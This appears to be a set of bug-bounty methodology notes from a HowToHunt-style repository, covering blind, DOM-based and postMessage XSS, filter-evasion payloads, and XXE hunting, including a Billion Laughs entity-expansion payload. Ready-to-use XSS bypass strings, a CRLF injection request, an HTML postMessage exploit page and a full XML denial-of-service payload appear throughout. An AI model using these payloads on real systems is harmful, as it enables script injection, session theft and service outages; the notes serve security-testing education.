 86 | Blind XSS occurs when the payload does not immediately reflect, but executes later in backend systems or admin panels.
 87 | 
 88 | ### **Detection Techniques**
 89 | 1. Inject payloads that call back to a **listener** on your server.
 90 | 2. Use:
 91 |    - **[XSS Hunter](https://xsshunter.com/)**
 92 |    - **Burp Collaborator**
 93 |    - **Ngrok** for receiving callbacks.
 94 | 3. Test injection points such as:
 95 |    - **Contact forms**
 96 |    - **Admin dashboards**
 97 |    - **User input logs**
 98 |    - **E-commerce checkout fields**
 99 | 
100 | ### **Common Injection Points**
101 | - **Review and feedback forms**
102 | - **Address fields in e-commerce sites**
103 | - **User-Agent headers**
104 | - **Log viewers**
105 | - **Chat applications**
106 | - **Moderation panels**
107 | 
108 | ### **Video References**
109 | - [Blind XSS Hunting](https://www.youtube.com/watch?v=uHy1x1NkwRU)
110 | 
111 | ---
112 | 
113 | ## **4. DOM-Based XSS**
114 | DOM XSS occurs when JavaScript dynamically manipulates the page without sanitizing user input.
115 | 
116 | ### **Tips**
117 | - Manual detection is difficult; use tools like:
118 |   - **Burp Suite PRO**
119 |   - **[RA2 DOM XSS Scanner](https://github.com/dpnishant/ra2-dom-xss-scanner)**
120 | 
121 | ### **Video References**
122 | - [Understanding DOM XSS](https://www.youtube.com/watch?v=gBqzzhgHoYg)
123 | 
124 | ---
125 | 
126 | ## **5. XSS Filter Evasion Techniques**
127 | ### **General Bypass Techniques**
128 | - Replace `<` and `>` with **HTML entities**:
129 |   ```html
130 |   &lt;script&gt;alert(1)&lt;/script&gt;
131 |   ```
132 | - Use **XSS polyglots**:
133 |   ```html
134 |   javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
135 |   ```
136 |   - [Full XSS Polyglots List](https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626)
137 | 
138 | ### **XSS Firewall Bypass**
139 | - **Bypass lowercase filtering**:
140 |   ```html
141 |   <scRipT>alert(1)</scRipT>
142 |   ```
143 | - **Break firewall regex using new lines**:
144 |   ```html
145 |   <script>%0alert(1)</script>
146 |   ```
147 | - **Double Encoding**:
148 |   ```plaintext
149 |   %2522
150 |   ```
151 | - **Recursive filters bypass**:
152 |   ```html
153 |   <src<script>ipt>alert(1);</scr</script>ipt>
154 |   ```
155 | - **Injecting anchor tags without whitespace**:
156 |   ```html
157 |   <a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
158 |   ```
159 | - **Bypassing whitespace filtering using a bullet (`•`)**:
160 |   ```html
161 |   <svg•onload=alert(1)>
162 |   ```
163 | - **Changing request methods**:
164 |   ```
165 |   GET /?q=xss  
166 |   POST / q=xss
167 |   ```
168 | - **Injecting CRLF characters for HTTP response splitting**:
169 |   ```
170 |   GET /%0A%0DValue=%20Virus
171 |   ```
172 | 
173 | ---
174 | 
175 | ## **Acknowledgments and References**
176 | ### **Special Thanks**
177 | - **[The XSS Rat](https://www.youtube.com/channel/UCjBhClJ59W4hfUly51i11hg)**
178 | - **[@sratarun](https://twitter.com/sratarun)**
179 | 
180 | ### **References**
181 | - **[Hunting Checklist](https://github.com/heilla/SecurityTesting/blob/master/HuntingCheckList.md)**
182 | 
183 | ### **Authors**
184 | - **[@KathanP19](https://twitter.com/KathanP19)**
185 | - **[@harsha0x01](https://twitter.com/harsha0x01)**
186 | 
187 | ---
188 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
189 | 


--------------------------------------------------------------------------------
/XSS/post_message_xss.md:
--------------------------------------------------------------------------------
 1 | # **PostMessage XSS (Cross-Site Scripting) Vulnerability**
 2 | 
 3 | ## **Introduction**
 4 | The `postMessage` API is widely used in modern web applications to enable cross-origin communication between different windows, iframes, and pop-ups. However, **if the receiving application does not properly validate the origin of incoming messages**, it may be vulnerable to **PostMessage XSS**.
 5 | 
 6 | This vulnerability allows attackers to send malicious data from an **untrusted source (e.g., sandboxed iframe, null origin, or malicious website)** to a trusted application, leading to **security risks such as data theft, session hijacking, and arbitrary JavaScript execution.**
 7 | 
 8 | ---
 9 | 
10 | ## **How PostMessage Works**
11 | The `window.postMessage()` function allows scripts running in one window to send messages to another window. The syntax is:
12 | 
13 | ```javascript
14 | window.postMessage(message, targetOrigin, [transfer]);
15 | ```
16 | 
17 | - `message`: The data to be sent to the target window.
18 | - `targetOrigin`: A string specifying the expected origin of the recipient (use `"*"` to allow any origin, which is insecure).
19 | - `transfer`: Optional, used for passing objects.
20 | 
21 | Example of secure usage:
22 | ```javascript
23 | window.postMessage("data", "https://trusted-site.com");
24 | ```
25 | 
26 | ---
27 | 
28 | ## **Vulnerability: Improper Origin Validation**
29 | If an application listens for `postMessage` events **without verifying the sender’s origin**, an attacker can exploit this by crafting a malicious message from an unauthorized source.
30 | 
31 | ### **Example of an Insecure Implementation**
32 | ```javascript
33 | window.addEventListener("message", function (event) {
34 |     // No origin validation
35 |     document.body.innerHTML = event.data;
36 | });
37 | ```
38 | **Security Issue:**  
39 | - The application directly processes any received message without verifying the sender's origin.
40 | - If an attacker sends a malicious payload (e.g., JavaScript injection), it can lead to XSS.
41 | 
42 | ### **Exploitation Scenario**
43 | 1. The vulnerable website listens for messages using `postMessage`, but **does not check the sender’s origin**.
44 | 2. An attacker hosts a malicious page and sends a **crafted message** to the vulnerable application.
45 | 3. The malicious script gets executed inside the vulnerable website, leading to **DOM-based XSS**.
46 | 
47 | ---
48 | 
49 | ## **Exploiting PostMessage XSS**
50 | 
51 | ### **Proof of Concept (PoC)**
52 | The following PoC demonstrates how an attacker can inject malicious JavaScript into a vulnerable application by exploiting a poorly validated `postMessage` request.
53 | 
54 | ```html
55 | <!doctype html>
56 | <html>
57 | <head>
58 |     <meta charset="UTF-8" />
59 |     <title>PostMessage XSS PoC</title>
60 |     <script>
61 |         function pocLink() {
62 |             var ref = window.open('https://vulnerable-website.com'); // Open target
63 |             ref.postMessage("<img src=x onerror=alert('XSS Exploited')>", "https://vulnerable-website.com");
64 |         }
65 |     </script>
66 | </head>
67 | <body>
68 |     <a href="#" onclick="pocLink();">Click to Exploit</a>          
69 |     <iframe src="https://vulnerable-website.com" onload="pocFrame(this.contentWindow)"></iframe>                    
70 | </body>
71 | </html>
72 | ```
73 | 
74 | ### **Breakdown of the Attack**
75 | - The script opens the target **vulnerable website** in a new window (`window.open()`).
76 | - It **sends a malicious payload** via `postMessage()` that contains an XSS injection.
77 | - If the application **does not validate the message origin**, the payload executes, triggering **arbitrary JavaScript execution**.
78 | 
79 | ---
80 | 
81 | ## **Impact of PostMessage XSS**
82 | An attacker exploiting this vulnerability can:
83 | - **Execute malicious JavaScript** on the vulnerable application.
84 | - **Steal sensitive data** such as session tokens, authentication credentials, or user inputs.
85 | - **Modify page content** or inject phishing links.
86 | - **Bypass Same-Origin Policy (SOP)** by controlling a trusted domain’s behavior.
87 | - **Perform clickjacking attacks** by embedding the site in an iframe.
88 | 
89 | ---
90 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
91 | 


--------------------------------------------------------------------------------
/XXE/Billion_Laugh_Attack.md:
--------------------------------------------------------------------------------
 1 | # Billion Laugh Attack
 2 | - Another common vulnerability associated with XML parsing is called A Billion Laughs Attack. It uses an entity to resolve itself cyclically thereby consuming more CPU usage and causing a denial of service attack. An Example XML payload that can cause an XXE attack is as follows:
 3 | 
 4 | ```
 5 | Step 1 : Capture the request into Burp
 6 | Step 2 : Send it to the repeater tab and then convert the body into XML whether it is accepting or not
 7 | Step 3 : To confirm, Check for the [ Accept ] Header change it into Application/json
 8 | Step 4 : Covert JSON into XML if their is no Possibility
 9 | Step 5 : Add the payload in between and change the content lol1 to lol9 depending on the dos variation in the xml field!
10 | ```
11 | 
12 | - Billion Laugh Payload :
13 | ```
14 | <?xml version="1.0"?>
15 | <!DOCTYPE lolz [
16 |  <!ENTITY lol "lol">
17 |  <!ELEMENT lolz (#PCDATA)>
18 |  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
19 |  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
20 |  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
21 |  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
22 |  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
23 |  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
24 |  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
25 |  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
26 |  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
27 | ]>
28 | <lolz>&lol9;</lolz> 
29 | ```
30 | 
31 | ## Contributor:
32 | - [N3T_hunt3r](https://twitter.com/N3T_hunt3r)
33 | 


--------------------------------------------------------------------------------
/XXE/XXE_Methods.md:
--------------------------------------------------------------------------------
 1 | # XML External Entities.
 2 | These are my methods to check and hunt for XML External Entities.
 3 | I might be missing a lot of things but as the community believe in "sharing is caring" by @CXVVMVII.
 4 | 
 5 | ## Methods
 6 | 1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml".
 7 | 2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files.
 8 | 3. If svg allowed in picture upload , you can inject xml in svgs.
 9 | 4. If the web app offers RSS feeds , add your milicious code into the RSS.
10 | 5. Fuzz for /soap api , some applications still running soap apis
11 | 6. If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
12 | 
13 | ## Twitter:
14 | * [whitechaitai](https://twitter.com/whitechaitai)
15 | 


--------------------------------------------------------------------------------